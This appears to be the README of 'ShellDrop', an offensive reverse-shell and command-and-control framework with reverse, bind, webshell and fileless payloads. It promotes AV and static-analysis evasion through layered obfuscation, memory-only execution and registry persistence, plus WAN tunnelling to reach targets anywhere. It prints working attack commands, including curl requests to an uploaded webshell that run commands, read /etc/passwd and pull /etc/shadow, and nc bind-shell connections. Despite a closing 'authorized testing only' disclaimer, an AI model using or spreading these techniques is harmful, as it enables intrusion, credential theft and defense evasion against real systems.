From Basic Listener → Hardened C2 → WAN-Enabled Framework — Five Generations of Evolution
Quick Start • Version Comparison • V5 Features • Usage Guide • Payload Types • WAN Setup • Architecture • Legal
┌─────────────────────────────────────────────────────────────────────┐
│ │
│ 🔐 HMAC-SHA256 Auth Your C2 can't be hijacked │
│ 🔒 XOR Traffic Enc Passive captures see nothing │
│ 👻 Multi-Layer Obf Static AV can't signature-match │
│ 🌐 WAN Port Forward Auto Portmap.io VPN — attack from anywhere│
│ 🥇 Fileless Payloads Lives in RAM, never touches disk │
│ 🐚 Auto TTY Upgrade Instant interactive shell, no manual work │
│ 📡 33+ Payloads Linux, Windows, PHP, JS, Bind, Webshell │
│ │
└─────────────────────────────────────────────────────────────────────┘
ShellDrop/
├── shelldrop.py # V1.0 Beta — Basic multi-client listener
├── shelldrop-v2.py # V2.0 Secure — HMAC auth + session logging
├── sheldrop-v3.py # V3.0 Obfuscated — Hex payloads + OS filter + PHP/JS
├── shelldrop-v4.py # V4.0 Hardened — Encrypted logs + file transfer + rate limit
├── shelldrop-v5.py # V5.0 WAN Edition — Portmap.io + Auto-TTY + Bind/Webshell/Fileless
├── configs/
│ └── rules/
│ └── config.json # Portmap.io WAN configuration
├── configs/
│ └── unknonehart.sheldrop.ovpn # OpenVPN config for portmap
├── shelldrop_logs/ # Encrypted session logs
├── banner.svg # Animated 3D SVG banner
└── README.md # This file
V1.0 Beta V2.0 Secure V3.0 Obfuscated V4.0 Hardened V5.0 WAN Edition
┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐
│ 9 basic │───────▶│ 11 pay │────────▶│ 15+ obf │────────▶│ 15+ obf │────────▶│ 33+ pay │
│ payloads│ │ +HMAC │ │ +PHP/JS │ │ +encrypt│ │ +WAN │
│ no auth │ │ +logging│ │ +filter │ │ +filetx │ │ +fileles│
└─────────┘ └─────────┘ └─────────┘ └─────────┘ └─────────┘
| Feature | V1.0 Beta | V2.0 Secure | V3.0 Obfuscated | V4.0 Hardened | V5.0 WAN |
|---|---|---|---|---|---|
| Multi-Client | ✅ | ✅ | ✅ | ✅ | ✅ |
| Payload Count | 9 | 11 | 15+ | 15+ | 33+ |
| Authentication | ❌ | ✅ HMAC | ✅ HMAC | ✅ HMAC | ✅ HMAC |
| Payload Obfuscation | ✅ Multi-layer | ✅ Multi-layer | ✅ Multi-layer | ||
| OS Filtering | ❌ | ❌ | ✅ --sis |
✅ --sis |
✅ --sys + -t |
| PHP / Node.js Shells | ❌ | ❌ | ✅ | ✅ | ✅ |
| Auto TTY Upgrade | ❌ | ❌ | ✅ Automatic | ||
| Session Logging | ❌ | ✅ Plain | ✅ Plain | ✅ Encrypted | ✅ Encrypted |
| File Upload/Download | ❌ | ❌ | ❌ | ✅ | ✅ |
| Command History | ❌ | ❌ | ❌ | ✅ | ✅ |
| Rate Limiting | ❌ | ❌ | ❌ | ✅ 3/60s | ✅ 3/60s |
| Heartbeat | ❌ | ❌ | ❌ | ✅ 30s | ✅ 30s |
| 🌐 WAN / Portmap.io | ❌ | ❌ | ❌ | ❌ | ✅ NEW |
| 🔗 Bind Shell | ❌ | ❌ | ❌ | ❌ | ✅ NEW |
| 🌐 Webshell | ❌ | ❌ | ❌ | ❌ | ✅ NEW |
| 🥇 Fileless/Memory-Only | ❌ | ❌ | ❌ | ❌ | ✅ NEW |
| Auto VPN Start | ❌ | ❌ | ❌ | ❌ | ✅ NEW |
| Adapter Detection | ❌ | ❌ | ❌ | ❌ | ✅ NEW |
| Sudo Auto-Prompt | ❌ | ❌ | ❌ | ❌ | ✅ NEW |
| TLS Support | ❌ | ✅ | ✅ | ✅ | ✅ |
| Architecture | Globals | Globals | Globals | OOP Class | OOP Class |
git clone https://github.com/kishwordulal1234/ShellDrop.git
cd ShellDrop# 🐧 Linux reverse shell payloads + WAN mode
python3 shelldrop-v5.py --sys=l -t=rv --wan
# 🪟 Windows fileless memory-only payloads
python3 shelldrop-v5.py --sys=w -t=fl -p 4444
# 🌐 Webshell payloads (PHP + JSP + ASPX)
python3 shelldrop-v5.py --sys=web -t=ws --wan
# 🔗 All bind shell payloads
python3 shelldrop-v5.py --sys=l -t=b --wan# V1 — Simple, no auth, quick testing
python3 shelldrop.py -p 4444
# V2 — Auth + logging
python3 shelldrop-v2.py -p 4444 --token "MyToken"
# V3 — Obfuscated payloads + OS filtering
python3 sheldrop-v3.py -p 4444 --sis=l --token "MyToken"
# V4 — Everything + encryption + file transfer
python3 shelldrop-v4.py -p 4444 --sis=l --token "MyToken"╔═══════════════════════════════════════════════════════════════╗
║ ShellDrop V 5.0 - WAN + AUTO-TTY EDITION ║
║ Obfuscated & Encrypted Reverse Shell Framework ║
╚═══════════════════════════════════════════════════════════════╝
🔒 XOR Traffic Encryption: ENABLED 🌐 WAN Mode: PORTMAP.IO
🔐 HMAC Authentication: ENABLED 🐚 Auto TTY: AUTOMATIC
📝 Encrypted Logging: ENABLED 📡 Payloads: 33+
🛡️ Rate Limiting: 3 attempts / 60s 🥇 Fileless: MEMORY-ONLY
| Feature | Description |
|---|---|
| 🌐 WAN via Portmap.io | Auto-starts OpenVPN, forwards ports, generates WAN payloads |
| 🐚 Auto-TTY Upgrade | Automatically upgrades shell to interactive TTY after OS detection |
| 🔗 Bind Shell | Target opens a port, you connect to it (5 variants) |
| 🌐 Webshell | PHP/JSP/ASPX webshells with password auth + file manager |
| 🥇 Fileless Payloads | Reflective load, WMI spawn, runspace injection, memfd_create |
| 📡 33+ Payloads | Across 7 categories: Linux, Windows, PHP, JS, Bind, Webshell, Fileless |
| 🔍 Adapter Detection | Auto-detects network adapter or manual -e wlp3s0 |
| 🔑 Sudo Auto-Prompt | Asks password and re-launches as root automatically |
python3 shelldrop-v5.py [OPTIONS]
-p, --port PORT Port to listen on (auto from config with --wan)
-l, --listen-ip IP Bind address (auto-detected)
-e, --adapter ADAPTER Network adapter (e.g. wlp3s0, tun0, eth0)
--tls Enable TLS encryption
--token TOKEN Auth token (auto-generated if omitted)
--sys {l,w,web} Target OS filter:
l = 🐧 Linux payloads
w = 🪟 Windows payloads
web = 🐘 PHP + 📦 JS payloads
-t, --type {rv,b,ws,fl} Payload type filter:
rv = 🔄 Reverse Shell (default)
b = 🔗 Bind Shell
ws = 🌐 Webshell
fl = 🥇 Fileless / Memory-Only
--wan Enable WAN mode (auto Portmap.io VPN + payloads)
--wan-config PATH Config path (default: ./configs/rules/config.json)
--log-dir DIR Log directory (default: ./shelldrop_logs)
┌──────────────────────────────────────────────────────────────────────────────┐
│ COMMAND │ WHAT YOU GET │
├──────────────────────────────────────────────────────────────────────────────┤
│ --sys=l -t=rv │ Linux reverse shells │
│ --sys=l -t=rv --wan │ Linux reverse + WAN │
│ --sys=w -t=rv │ Windows reverse shells │
│ --sys=w -t=fl │ Windows fileless (RAM) │
│ --sys=w -t=fl --wan │ Windows fileless + WAN │
│ --sys=l -t=b │ Linux bind shells │
│ --sys=web -t=ws │ PHP/JSP/ASPX webshells │
│ --sys=web -t=rv │ PHP + JS reverse shells │
│ (no --sys, no -t) │ ALL 33+ payloads │
│ --wan (no -p) │ Auto port from config │
└──────────────────────────────────────────────────────────────────────────────┘
Target connects back to you. You run the listener, target executes the payload.
┌─────────┐ ┌──────────┐
│ ATTACKER│◀────── TCP Connection ───────│ TARGET │
│ Listener│ (target connects back) │ (payload)│
│ :5354 │ │ │
└─────────┘ └──────────┘
▲ │
│ 1. Start listener │
│ 2. Copy payload │
│ 3. Execute on target │
└────────────────────────────────────────┘
6 Linux variants:
| # | Method | Stealth | Survives Logout |
|---|---|---|---|
| 1 | Obfuscated Daemon ⭐ | ★★★★★ | ✅ Double-fork |
| 2 | Compressed + Encoded | ★★★★★ | ✅ Background |
| 3 | Nohup + Base64 | ★★★★ | ✅ Nohup |
| 4 | Screen Detached | ★★★★★ | ✅ Screen |
| 5 | Double-Encoded | ★★★★ | ✅ Disown |
| 6 | Bash Wrapper | ★★★★ | ✅ Nohup |
6 Windows variants:
| # | Method | Stealth |
|---|---|---|
| 1 | PS Hidden Start | ★★★★★ |
| 2 | PS Background Job | ★★★★ |
| 3 | PS WMI Create | ★★★★★ |
| 4 | PS Encoded (UTF-16LE) | ★★★ |
| 5 | Scheduled Task | ★★★★ |
| 6 | Python via PS | ★★★★ |
PHP + Node.js — Save as .php or .js, deploy on web server.
Target opens a port and waits for you to connect.
┌─────────┐ ┌──────────┐
│ ATTACKER│─────── TCP Connection ──────▶│ TARGET │
│ (you) │ (you connect to them) │ Listener │
│ │ │ :5354 │
└─────────┘ └──────────┘
│ ▲
│ 1. Execute payload on target │
│ 2. Target opens port │
│ 3. Connect with: nc TARGET 5354│
└────────────────────────────────────────┘
| Payload | Platform | Auth |
|---|---|---|
| Python Bind Shell | 🐧 Linux | ❌ |
| Python Bind + Password | 🐧 Linux | ✅ Token |
| PowerShell Bind | 🪟 Windows | ❌ |
| Netcat Bind | 🐧 Linux | ❌ |
| Ncat + SSL Bind | 🐧 Linux | ✅ SSL |
Usage:
# Generate bind shell payloads
python3 shelldrop-v5.py --sys=l -t=b -p 5354
# Execute payload on target, then connect:
nc TARGET_IP 5354Upload a file to a web server. Execute commands via HTTP POST.
┌─────────┐ HTTP POST ┌──────────┐
│ ATTACKER│──────────────────────────────▶│ WEB │
│ (curl) │ p=PASSWORD&c=whoami │ SERVER │
│ │◀─────────────────────────────-│ shell.php│
└─────────┘ <pre>www-data</pre> └──────────┘
| Payload | Platform | Features |
|---|---|---|
| PHP Webshell ⭐ | Apache/Nginx | Password auth, returns 404 to bots |
| PHP File Manager | Apache/Nginx | Upload/download files via curl |
| JSP Webshell | Tomcat/Java | Password auth |
| ASPX Webshell | IIS/.NET | Password auth |
Setup:
# 1. Generate webshell
python3 shelldrop-v5.py --sys=web -t=ws -p 5354
# 2. Copy the PHP code, save as shell.php
# 3. Upload to target web server
# 4. Execute commands:
curl -s -X POST http://target.com/shell.php -d "p=PASSWORD&c=id"
curl -s -X POST http://target.com/shell.php -d "p=PASSWORD&c=cat /etc/passwd"
# 5. Upload a file:
curl -X POST http://target.com/shell.php -d "p=PASSWORD" -F "ul=@payload.sh"
# 6. Download a file:
curl -X POST http://target.com/shell.php -d "p=PASSWORD&dl=/etc/shadow" -o shadow.txtNever touches the disk. Lives entirely in RAM. AV/EDR has no file to scan.
┌──────────────────────────────────────────────────────────┐
│ TARGET SYSTEM │
│ │
│ ┌─────────────┐ ┌──────────────────────────────┐ │
│ │ powershell │───▶│ MEMORY (RAM) │ │
│ │ (parent) │ │ ┌────────────────────────────┐│ │
│ │ │ │ │ Decoded Base64 → Executed ││ │
│ │ │ │ │ Reverse Shell Connection ││ │
│ │ │ │ │ NO FILE WRITTEN TO DISK ││ │
│ │ │ │ └────────────────────────────┘│ │
│ └─────────────┘ └──────────────────────────────────┘ │
│ │
│ 📁 Disk: EMPTY — Nothing for AV to scan │
└──────────────────────────────────────────────────────────┘
| Payload | Platform | Technique | Persistence |
|---|---|---|---|
| Reflective Load ⭐ | 🪟 Windows | Base64 decode → execute in RAM | ❌ Dies on reboot |
| WMI Spawn | 🪟 Windows | Runs inside wmiprvse.exe |
❌ |
| Runspace Injection | 🪟 Windows | PS Runspace — zero disk I/O | ❌ |
| Registry + Memory | 🪟 Windows | HKCU Run key + RAM exec | ✅ Survives reboot |
| Python In-Memory | 🐧 Linux | Fork/setsid daemon in interpreter | ❌ |
| memfd_create | 🐧 Linux | Anonymous memory FD — zero disk | ❌ |
Usage:
# Windows fileless payloads
python3 shelldrop-v5.py --sys=w -t=fl -p 4444
# Linux fileless payloads
python3 shelldrop-v5.py --sys=l -t=fl --wan
# With persistence (registry key survives reboot)
# → Use "Windows Fileless + Registry Persistence" payload ┌─────────────────┐ VPN Tunnel ┌────────────────────┐
│ YOUR MACHINE │◀═══════════════════════▶│ PORTMAP.IO │
│ │ OpenVPN │ PUBLIC SERVER │
│ ShellDrop │ │ │
│ Listener :5354 │ │ unknonehart-38596 │
│ │ │ .portmap.host │
│ tun0: 10.9.x.x │ │ :38596 │
└─────────────────┘ └────────────────────┘
▲
│
TCP Connection
│
┌────────────────────┐
│ TARGET │
│ (anywhere on │
│ the internet) │
│ │
│ Runs WAN payload: │
│ connect to │
│ portmap.host:38596│
└────────────────────┘
FLOW:
1. ShellDrop starts OpenVPN → connects to portmap.io
2. Portmap.io assigns: unknonehart-38596.portmap.host:38596
3. Port 38596 on portmap → forwards to your local port 5354
4. Target executes WAN payload → connects to portmap host:38596
5. Portmap forwards → your ShellDrop listener on :5354
6. You get the shell! 🐚
- Go to portmap.io
- Sign up / log in
- Download your OpenVPN config (
.ovpnfile) - Create a TCP mapping rule (e.g.,
38596 → 5354)
Place your .ovpn file:
cp ~/Downloads/unknonehart.sheldrop.ovpn configs/Edit configs/rules/config.json:
{
"portmap": {
"config_path": "./configs/unknonehart.sheldrop.ovpn",
"mapping_rule": "tcp://unknonehart-38596.portmap.host:38596 => 5354",
"protocol": "tcp"
},
"iprule": {
"ip": "unknonehart-38596.portmap.host",
"port": "38596",
"protocol": "tcp",
"listen_port": "5354"
}
}# No -p needed — auto-reads port 5354 from config
python3 shelldrop-v5.py --sys=l -t=rv --wanWhat happens automatically:
[!] ShellDrop requires root privileges.
[sudo] password for user: ********
[✓] Authenticated. Launching as root...
[*] Using listen port 5354 from config
[*] Starting portmap.io VPN: openvpn ./configs/unknonehart.sheldrop.ovpn
[*] Waiting for VPN tunnel to establish...
[VPN] TCP connection established with 193.161.193.99:1194
[VPN] Initialization Sequence Completed
[✓] VPN tunnel established!
[*] LAN adapter: wlp3s0 → 192.168.101.15
[*] Listening on 0.0.0.0 (all interfaces — LAN + VPN)
[✓] Listener active on 0.0.0.0:5354
═══ 📡 LAN PAYLOADS ═══
(payloads connecting to 192.168.101.15:5354)
═══ 🌐 WAN PAYLOADS ═══
(payloads connecting to unknonehart-38596.portmap.host:38596)
┌───────────────────────────────────────────────────────────────────────────┐
│ ShellDrop V5.0 Server │
├───────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────────────────────────────────────────────────────────────────┐ │
│ │ MAIN ENTRY POINT │ │
│ │ • Sudo enforcement (getpass + exec) │ │
│ │ • Argparse (--sys, -t, --wan, -e, -p) │ │
│ │ • Config parser (configs/rules/config.json) │ │
│ │ • OpenVPN auto-start (portmap.io) │ │
│ │ • Adapter detection (wlp3s0 / tun0 / eth0) │ │
│ └─────────────────────────────────────────────────────────────────────┘ │
│ │ │
│ ▼ │
│ ┌─────────────────────────────────────────────────────────────────────┐ │
│ │ ShellDropServer CLASS │ │
│ │ │ │
│ │ ┌──────────────┐ ┌──────────────┐ ┌──────────────────────────┐ │ │
│ │ │ run() │ │ Payload Gen │ │ accept_connections() │ │ │
│ │ │ • Show banner │ │ • 33+ paylds │ │ • HMAC challenge │ │ │
│ │ │ • LAN paylds │ │ • LAN + WAN │ │ • Rate limiting │ │ │
│ │ │ • WAN paylds │ │ • All types │ │ • Client creation │ │ │
│ │ │ • User input │ │ │ │ │ │ │
│ │ └──────────────┘ └──────────────┘ └──────────────────────────┘ │ │
│ │ │ │
│ │ ┌──────────────────────────────────────────────────────────────┐ │ │
│ │ │ Client CLASS │ │ │
│ │ │ • receive_data() — XOR decrypt + output queue │ │ │
│ │ │ • send_data() — Command history + XOR encrypt │ │ │
│ │ │ • _auto_tty_upgrade() — Auto script/pty after OS detect │ │ │
│ │ │ • process_command() — upload/download/history/background │ │ │
│ │ └──────────────────────────────────────────────────────────────┘ │ │
│ │ │ │
│ │ ┌──────────────┐ ┌──────────────┐ ┌──────────────────────────┐ │ │
│ │ │ SessionLog │ │ Heartbeat │ │ Rate Limiter │ │ │
│ │ │ XOR encrypt │ │ 30s keepalive│ │ 3 fails → 60s block │ │ │
│ │ └──────────────┘ └──────────────┘ └──────────────────────────┘ │ │
│ └─────────────────────────────────────────────────────────────────────┘ │
│ │
└───────────────────────────────────────────────────────────────────────────┘
┌──────────┐ ┌──────────┐
│ TARGET │ │ SHELLDROP│
│ (Client) │ │ (Server) │
└────┬─────┘ └────┬─────┘
│ │
│ ──────── TCP Connect ──────────────────────────▶ │
│ │
│ ◀─────── AUTH:<base64_challenge> ────────────── │
│ │
│ Compute: HMAC-SHA256(token, challenge) │
│ │
│ ──────── <base64_hmac_response> ───────────────▶ │
│ │
│ ┌──── Verify HMAC ────┐ │
│ │ compare_digest() │ │
│ │ timing-safe │ │
│ └─────────┬──────────┘ │
│ │ │
│ ◀─────── AUTH:OK ──┘ (or AUTH:FAIL + rate limit) │
│ │
│ ◀═══════ Interactive Shell ═════════════════════▶ │
│ (XOR encrypted traffic) │
│ │
│ [Auto TTY Upgrade if Linux detected] │
│ │
┌─────────────────────────────────────────────────────────────┐
│ PAYLOAD OBFUSCATION STACK │
├─────────────────────────────────────────────────────────────┤
│ │
│ Layer 7 │ chr() Construction │ String from ints │
│ Layer 6 │ Double Base64 │ Two decode layers │
│ Layer 5 │ Zlib Compression │ Binary compressed │
│ Layer 4 │ Base64 Wrapping │ Payload body hidden │
│ Layer 3 │ Import Aliasing │ socket → _s │
│ Layer 2 │ Variable Mangling │ _s, _p, _o, _k │
│ Layer 1 │ Hex Encoding │ IP + token as hex │
│ │
│ Result: AV signature matching = IMPOSSIBLE │
│ Static analysis = DEFEATED │
│ String grep for IP/token = NOTHING FOUND │
└─────────────────────────────────────────────────────────────┘
| Command | Description |
|---|---|
list |
Show all active sessions with ID, IP, port, OS |
use <id> |
Enter interactive session with client |
kill <id> |
Terminate and remove a session |
help |
Show available commands |
exit / quit |
Shutdown listener and all sessions |
| Command | Description | Version |
|---|---|---|
background |
Return to main menu | V1+ |
history |
Show last 20 commands + timestamps | V4+ |
!<n> |
Re-execute command #n from history | V4+ |
upload <local> <remote> |
Upload file to target | V4+ |
download <remote> <local> |
Download file from target | V4+ |
| Layer | Protection | Version |
|---|---|---|
| HMAC Auth | Challenge-response prevents C2 hijacking | V2+ |
| Timing-Safe Compare | hmac.compare_digest() prevents timing attacks |
V4+ |
| Rate Limiting | 3 failures → 60s IP block | V4+ |
| XOR Traffic Encryption | All traffic XOR-encrypted | V4+ |
| Encrypted Logs | Session logs XOR with token-derived key | V4+ |
| Heartbeat | Dead session cleanup every 30s | V4+ |
| Input Sanitization | Control character stripping | V4+ |
| Optional TLS | Full SSL/TLS with --tls flag |
V2+ |
# 1. Check VPN is running
ip link show tun0
# 2. Verify listener is on 0.0.0.0 (not a specific IP)
# Use --wan flag to auto-bind to all interfaces
# 3. Check portmap mapping matches config
cat configs/rules/config.jsonsudo lsof -i :5354
sudo kill -9 <PID># Ensure token matches between listener and payload
# The token is auto-embedded in payloads — just copy the exact payload shown- ✨ MAJOR: WAN mode — Auto Portmap.io VPN + WAN payloads
- ✨ MAJOR: Bind shell — 5 variants (Python, PowerShell, netcat)
- ✨ MAJOR: Webshell — PHP, JSP, ASPX with password auth + file manager
- ✨ MAJOR: Fileless — Reflective load, WMI, runspace, memfd_create
- ✨ Auto-TTY upgrade (automatic after OS detection)
- ✨
--sys+-tdual filtering (--sys=l -t=fl) - ✨ Adapter auto-detection +
-eflag - ✨ Sudo auto-prompt with password
- ✨ 33+ total payloads
- ✨ File upload/download
- ✨ Command history + recall
- ✨ XOR-encrypted session logs
- ✨ Rate limiting + heartbeat
- ✨ OOP architecture
- ✨ Multi-layer payload obfuscation
- ✨
--sisOS filtering - ✨ PHP + Node.js authenticated shells
- ✨ HMAC-SHA256 authentication
- ✨ Session logging + TLS
- ✅ Multi-client support + 9 payloads
╔═══════════════════════════════════════════════════════════════╗
║ ⚠️ LEGAL DISCLAIMER ⚠️ ║
╠═══════════════════════════════════════════════════════════════╣
║ ║
║ ShellDrop is developed for AUTHORIZED SECURITY TESTING ONLY ║
║ ║
║ 📜 LICENSE TERMS: ║
║ ✅ FREE to use, modify, and distribute ║
║ ✅ Must give credit to the original Author ║
║ ✅ Must include the LICENSE file in all copies ║
║ ❌ Cannot sell without 30% revenue share to Author ║
║ ❌ Author NOT liable for any misuse or damage ║
║ ║
║ Before using this tool, you MUST: ║
║ 1. ✅ Have written authorization from the system owner ║
║ 2. ✅ Operate within scope of your penetration test ║
║ 3. ✅ Comply with all applicable laws and regulations ║
║ 4. ✅ Not use for malicious purposes ║
║ 5. ✅ Maintain confidentiality of tokens and logs ║
║ ║
║ Any misuse or illegal activity is the USER's sole ║
║ responsibility, NOT the developer's. ║
║ ║
║ See LICENSE file for full terms. ║
║ PROFESSIONAL USE ONLY. BE ETHICAL. BE LEGAL. ║
╚═══════════════════════════════════════════════════════════════╝
unknone hart / kishwor dulal
Found a bug? Open an issue with: Python version, OS, error message, steps to reproduce, and ShellDrop version.
- GitHub Issues — Bug reports
- Pull Requests — Contributions welcome
╔═══════════════════════════════════════════════════════════╗
║ ShellDrop v5.0 Quick Reference ║
╠═══════════════════════════════════════════════════════════╣
║ ║
║ START (WAN + Auto Everything) ║
║ python3 shelldrop-v5.py --sys=l -t=rv --wan ║
║ ║
║ TARGET OS PAYLOAD TYPE ║
║ --sys=l Linux -t=rv Reverse Shell (default) ║
║ --sys=w Windows -t=b Bind Shell ║
║ --sys=web PHP+JS -t=ws Webshell ║
║ -t=fl Fileless (Memory-Only) ║
║ ║
║ MODIFIERS ║
║ --wan Auto VPN + WAN payloads ║
║ -p PORT Manual port (auto with --wan) ║
║ -e ADAPTER Specific adapter (wlp3s0, tun0) ║
║ --tls TLS encryption ║
║ --token TOKEN Custom auth token ║
║ ║
║ SESSION COMMANDS ║
║ list / use <id> / kill <id> / exit ║
║ history / !<n> / upload / download / background ║
║ ║
║ 🔐 HMAC Auth 🛡️ Rate Limit 🔒 XOR Encryption ║
║ 🌐 WAN Mode 🥇 Fileless 🐚 Auto TTY ║
╚═══════════════════════════════════════════════════════════╝
Made with ❤️ for the Security Community
V1.0 → V2.0 → V3.0 → V4.0 → V5.0 — Five Generations of Evolution